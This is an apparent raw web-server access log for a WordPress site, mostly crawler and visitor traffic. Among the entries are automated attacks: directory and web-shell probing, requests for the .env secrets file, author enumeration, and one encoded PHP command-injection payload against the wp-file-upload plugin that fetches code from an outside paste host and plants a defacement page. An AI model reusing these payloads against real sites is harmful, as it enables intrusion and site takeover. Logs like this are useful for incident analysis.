74.176.50.3 - - [30/Mar/2025:18:29:15 -0400] "GET /wp-includes/js/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:16 -0400] "GET /wp-includes/php-compat/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:16 -0400] "GET /wp-includes/PHPMailer/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:16 -0400] "GET /wp-includes/pomo/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:16 -0400] "GET /wp-includes/random_compat/ HTTP/1.1" 200 97542 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:16 -0400] "GET /wp-includes/Requests/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:16 -0400] "GET /wp-includes/rest-api/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:17 -0400] "GET /wp-includes/SimplePie/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:17 -0400] "GET /wp-includes/sitemaps/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:17 -0400] "GET /wp-includes/sodium_compat/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:17 -0400] "GET /wp-includes/style-engine/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:17 -0400] "GET /wp-includes/Text/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:17 -0400] "GET /wp-includes/theme-compat/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:17 -0400] "GET /wp-includes/widgets/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:18 -0400] "GET /wp-admin/css/colors/ectoplasm/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:18 -0400] "GET /wp-admin/css/colors/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:18 -0400] "GET /admin/images/slider/ HTTP/1.1" 200 97542 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:18 -0400] "GET /admin/fckeditor/editor/filemanager/ HTTP/1.1" 200 97524 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:18 -0400] "GET /sites/default/files/ HTTP/1.1" 200 97663 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:18 -0400] "GET /admin/controller/extension/extension/ HTTP/1.1" 200 97612 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:19 -0400] "GET /modules/mod_simplefileuploadv1.3/elements/ HTTP/1.1" 200 97634 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:19 -0400] "GET /components/ HTTP/1.1" 200 97663 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:19 -0400] "GET /admin/uploads/images/ HTTP/1.1" 200 97634 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:19 -0400] "GET /wp-includes/js/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:19 -0400] "GET /wp-includes/pomo/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:20 -0400] "GET /wp-includes/rest-api/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:20 -0400] "GET /wp-includes/widgets/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:20 -0400] "GET /wp-admin/css/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:20 -0400] "GET /wp-admin/images/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:20 -0400] "GET /wp-admin/maint/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:20 -0400] "GET /wp-admin/meta/ HTTP/1.1" 200 97612 "-" "-"
198.54.114.83 - - [30/Mar/2025:18:29:24 -0400] "POST /wp-cron.php?doing_wp_cron=1743373764.8286550045013427734375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://saamigraphics.com"
74.176.50.3 - - [30/Mar/2025:18:29:20 -0400] "GET /wp-admin/network/ HTTP/1.1" 302 0 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:27 -0400] "GET /wp-admin/user/ HTTP/1.1" 302 0 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:30 -0400] "GET /wp-content/ HTTP/1.1" 200 0 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:30 -0400] "GET /wp-content/plugins/ HTTP/1.1" 200 0 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:31 -0400] "GET /wp-content/themes/ HTTP/1.1" 200 0 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:31 -0400] "GET /wp-admin/includes/ HTTP/1.1" 403 1242 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:31 -0400] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "-"
74.176.50.3 - - [30/Mar/2025:18:29:34 -0400] "GET /wp-content/upgrade/ HTTP/1.1" 403 1242 "-" "-"
216.244.66.202 - - [30/Mar/2025:18:40:56 -0400] "GET /robots.txt HTTP/1.1" 200 97651 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [30/Mar/2025:19:06:58 -0400] "GET /2022/04/14/erotiske-artikler-oslo-sex-kristiansand-fleecejakker-til-damer-finnmark/ HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
85.208.98.23 - - [30/Mar/2025:19:11:31 -0400] "GET /robots.txt HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
220.181.108.157 - - [30/Mar/2025:19:13:04 -0400] "GET / HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
45.11.21.26 - - [30/Mar/2025:19:24:07 -0400] "GET / HTTP/1.1" 200 97489 "http://saamigraphics.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
137.184.20.51 - - [30/Mar/2025:19:51:44 -0400] "GET /.env HTTP/1.1" 200 97612 "-" "python-requests/2.26.0"
137.184.20.51 - - [30/Mar/2025:19:51:45 -0400] "POST / HTTP/1.1" 200 97529 "-" "python-requests/2.26.0"
106.119.167.146 - - [30/Mar/2025:19:58:26 -0400] "GET / HTTP/1.1" 200 97669 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.159.152.4 - - [30/Mar/2025:20:01:57 -0400] "GET / HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
163.5.241.75 - - [30/Mar/2025:20:02:35 -0400] "GET / HTTP/1.1" 200 97489 "-" "Python/3.11 aiohttp/3.11.11"
220.181.108.155 - - [30/Mar/2025:20:20:08 -0400] "GET / HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.182 - - [30/Mar/2025:20:20:09 -0400] "GET / HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
216.244.66.202 - - [30/Mar/2025:20:23:45 -0400] "GET /exploring-the-myst/ HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [30/Mar/2025:20:25:22 -0400] "GET /how-do-youtube-views-work/ HTTP/1.1" 200 97651 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [30/Mar/2025:20:28:35 -0400] "POST /wp-cron.php?doing_wp_cron=1743380914.9743759632110595703125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://saamigraphics.com"
222.73.51.237 - - [30/Mar/2025:20:28:30 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:48 -0400] "GET /?author=1 HTTP/1.1" 200 97524 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:49 -0400] "GET /?author=2 HTTP/1.1" 200 97612 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:49 -0400] "GET /?author=3 HTTP/1.1" 200 97524 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:50 -0400] "GET /?author=4 HTTP/1.1" 200 97634 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:50 -0400] "GET /?author=5 HTTP/1.1" 200 97634 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:51 -0400] "GET /?author=6 HTTP/1.1" 200 97634 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:52 -0400] "GET /?author=7 HTTP/1.1" 200 97529 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:52 -0400] "GET /?author=8 HTTP/1.1" 200 97663 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:53 -0400] "GET /?author=9 HTTP/1.1" 200 97634 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:54 -0400] "GET /?author=10 HTTP/1.1" 200 97663 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:55 -0400] "GET /?author=11 HTTP/1.1" 200 97634 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:55 -0400] "GET /?author=12 HTTP/1.1" 200 97612 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:56 -0400] "GET /?author=13 HTTP/1.1" 200 97612 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:28:58 -0400] "GET /?author=14 HTTP/1.1" 200 97612 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:29:01 -0400] "GET /?author=15 HTTP/1.1" 200 97634 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:29:02 -0400] "GET /?author=16 HTTP/1.1" 200 97612 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:29:02 -0400] "GET /?author=17 HTTP/1.1" 200 97634 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:29:15 -0400] "GET /?author=18 HTTP/1.1" 200 97634 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:29:17 -0400] "GET /?author=19 HTTP/1.1" 200 97634 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
222.73.51.237 - - [30/Mar/2025:20:29:19 -0400] "GET /?author=20 HTTP/1.1" 200 97634 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_351)"
216.244.66.202 - - [30/Mar/2025:20:30:19 -0400] "GET /instant-hot-water-dispensers-for-modern-homes/feed/ HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
137.184.20.51 - - [30/Mar/2025:20:44:59 -0400] "GET /.env HTTP/1.1" 200 97489 "-" "python-requests/2.26.0"
137.184.20.51 - - [30/Mar/2025:20:45:00 -0400] "POST / HTTP/1.1" 200 97663 "-" "python-requests/2.26.0"
137.184.20.51 - - [30/Mar/2025:20:45:19 -0400] "GET /.env HTTP/1.1" 200 97489 "-" "python-requests/2.26.0"
137.184.20.51 - - [30/Mar/2025:20:45:20 -0400] "POST / HTTP/1.1" 200 97634 "-" "python-requests/2.26.0"
216.244.66.202 - - [30/Mar/2025:21:03:12 -0400] "GET /robots.txt HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [30/Mar/2025:21:10:21 -0400] "GET /crochets-muraux-decoratifs/ HTTP/1.1" 200 97663 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [30/Mar/2025:21:10:26 -0400] "GET /vita-glow-night-cream/ HTTP/1.1" 200 97529 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [30/Mar/2025:21:12:35 -0400] "GET /renovation-de-salle-de-bain-guide-complet-pour-transformer-votre-espace/ HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
41.140.4.245 - - [30/Mar/2025:21:29:50 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "http://saamigraphics.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:21:29:54 -0400] "POST /wp-cron.php?doing_wp_cron=1743384593.0439550876617431640625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://saamigraphics.com"
216.244.66.202 - - [30/Mar/2025:21:35:04 -0400] "GET /author/jorge/page/93/ HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
23.94.27.130 - - [30/Mar/2025:21:42:09 -0400] "GET /un-examen-des-produits-de-securite-a-domicile/ HTTP/1.1" 200 97524 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 OPR/89.0.4447.51"
23.94.27.130 - - [30/Mar/2025:21:42:09 -0400] "GET /un-examen-des-produits-de-securite-a-domicile/'%20+%20item.url%20+%20' HTTP/1.1" 200 97542 "http://saamigraphics.com/un-examen-des-produits-de-securite-a-domicile/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 OPR/89.0.4447.51"
65.130.164.207 - - [30/Mar/2025:21:45:07 -0400] "GET / HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
79.142.77.78 - - [30/Mar/2025:21:45:26 -0400] "GET / HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"
65.130.164.207 - - [30/Mar/2025:21:46:08 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
216.244.66.202 - - [30/Mar/2025:21:51:13 -0400] "GET /robots.txt HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
64.124.27.90 - - [30/Mar/2025:21:55:18 -0400] "GET / HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
52.11.171.106 - - [30/Mar/2025:21:55:42 -0400] "GET / HTTP/1.1" 200 97524 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
216.244.66.202 - - [30/Mar/2025:22:01:25 -0400] "GET /top-20-reasons-to-use-reusable-bags/ HTTP/1.1" 200 97524 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
137.184.20.51 - - [30/Mar/2025:22:03:31 -0400] "GET /.env HTTP/1.1" 200 97489 "-" "python-requests/2.26.0"
137.184.20.51 - - [30/Mar/2025:22:03:31 -0400] "POST / HTTP/1.1" 200 97663 "-" "python-requests/2.26.0"
196.251.88.242 - - [30/Mar/2025:22:04:16 -0400] "POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9 HTTP/1.1" 200 97536 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:22:04:27 -0400] "GET /wp-content/plugins/wp-file-upload/de.php HTTP/1.1" 200 97634 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:22:04:36 -0400] "GET /hk.php HTTP/1.1" 200 97542 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
216.244.66.202 - - [30/Mar/2025:22:09:13 -0400] "GET /online-moving-quotes/ HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
64.124.27.90 - - [30/Mar/2025:22:11:03 -0400] "GET / HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
216.244.66.202 - - [30/Mar/2025:22:17:31 -0400] "GET /understanding-online-betting-sites/feed/ HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [30/Mar/2025:22:24:44 -0400] "GET /deciphering-measurements-converting-1-8-inch-to-millimeters/feed/ HTTP/1.1" 200 97542 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
176.67.86.247 - - [30/Mar/2025:22:34:29 -0400] "GET /cbd-for-anxiety-uk-a-natural-remedy-for-anxiety/ HTTP/1.1" 200 97489 "http://saamigraphics.com/cbd-for-anxiety-uk-a-natural-remedy-for-anxiety/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.202 - - [30/Mar/2025:22:39:18 -0400] "GET /robots.txt HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [30/Mar/2025:22:49:50 -0400] "GET /gitarre-lernen-fur-anfanger-a-simple-method-to-get-started/ HTTP/1.1" 200 97542 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [30/Mar/2025:22:50:29 -0400] "GET /a-thrilling-adventure-awaits/ HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [30/Mar/2025:22:51:17 -0400] "GET /stainless-steel-a4/ HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
43.135.142.7 - - [30/Mar/2025:22:55:44 -0400] "GET / HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.134.29.139 - - [30/Mar/2025:23:08:49 -0400] "GET /un-examen-des-produits-de-securite-a-domicile/ HTTP/1.1" 200 97645 "http://saamigraphics.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
92.116.75.163 - - [30/Mar/2025:23:15:09 -0400] "GET / HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
52.11.171.106 - - [30/Mar/2025:23:15:52 -0400] "GET / HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
64.124.27.90 - - [30/Mar/2025:23:16:04 -0400] "GET / HTTP/1.1" 200 97663 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
216.244.66.202 - - [30/Mar/2025:23:28:54 -0400] "GET /robots.txt HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
27.7.66.104 - - [30/Mar/2025:23:36:06 -0400] "GET / HTTP/1.1" 200 97612 "-" "python-requests/2.32.2"
216.244.66.202 - - [30/Mar/2025:23:47:14 -0400] "GET /a-digital-revolution-in-gaming/feed/ HTTP/1.1" 200 97489 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [30/Mar/2025:23:47:46 -0400] "GET /unveiling-the-hidden-gem-real-estate-in-manilva/feed/ HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
194.35.121.164 - - [30/Mar/2025:23:48:20 -0400] "HEAD / HTTP/1.1" 200 0 "-" "-"
194.35.121.164 - - [30/Mar/2025:23:48:22 -0400] "GET / HTTP/1.1" 200 97612 "-" "-"
216.244.66.202 - - [30/Mar/2025:23:51:56 -0400] "GET /revolutionizing-energy-storage-the-graphene-battery-manufacturer/feed/ HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:00:30:19 -0400] "GET /robots.txt HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
84.247.50.194 - - [31/Mar/2025:00:31:40 -0400] "GET /cbd-for-anxiety-uk-a-natural-remedy-for-anxiety/ HTTP/1.1" 200 97634 "http://saamigraphics.com/cbd-for-anxiety-uk-a-natural-remedy-for-anxiety/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
60.188.57.0 - - [31/Mar/2025:00:40:09 -0400] "GET / HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.244.66.202 - - [31/Mar/2025:00:41:27 -0400] "GET /revitalisierung-urbaner-raume-das-wesen-der-gebaudereinigung-in-hamburg/ HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:00:43:32 -0400] "GET /revolutionizing-workplace-connectivity-the-employee-communication-app/feed/ HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:00:49:02 -0400] "GET /exploring-its-historic-straits/feed/ HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:00:51:29 -0400] "GET /revolutionizing-productivity-unleashing-taskade-ai-agents/feed/ HTTP/1.1" 200 97634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [31/Mar/2025:00:51:31 -0400] "GET /the-growing-trend-of-online-home-delivery-businesses-in-dubai/feed/ HTTP/1.1" 200 97663 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
2a02:247a:26d:1000::1 - - [31/Mar/2025:00:54:00 -0400] "GET / HTTP/1.1" 200 97612 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
163.5.241.75 - - [31/Mar/2025:01:11:23 -0400] "GET / HTTP/1.1" 200 97489 "-" "Python/3.11 aiohttp/3.11.11"
161.35.15.162 - - [31/Mar/2025:01:26:44 -0400] "GET /wp-includes/ID3/index.php HTTP/1.1" 200 97529 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.35.15.162 - - [31/Mar/2025:01:26:51 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 200 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [31/Mar/2025:01:26:59 -0400] "POST /wp-cron.php?doing_wp_cron=1743398818.4930140972137451171875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://saamigraphics.com"
161.35.15.162 - - [31/Mar/2025:01:26:54 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.35.15.162 - - [31/Mar/2025:01:27:06 -0400] "GET /wp-includes/IXR/index.php HTTP/1.1" 200 97529 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.35.15.162 - - [31/Mar/2025:01:27:10 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 200 97612 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.35.15.162 - - [31/Mar/2025:01:27:15 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.35.15.162 - - [31/Mar/2025:01:27:18 -0400] "GET /wp-content/plugins/admin.php HTTP/1.1" 200 97489 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
161.35.15.162 - - [31/Mar/2025:01:27:36 -0400] "GET /wp-admin.php HTTP/1.1" 200 97612 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
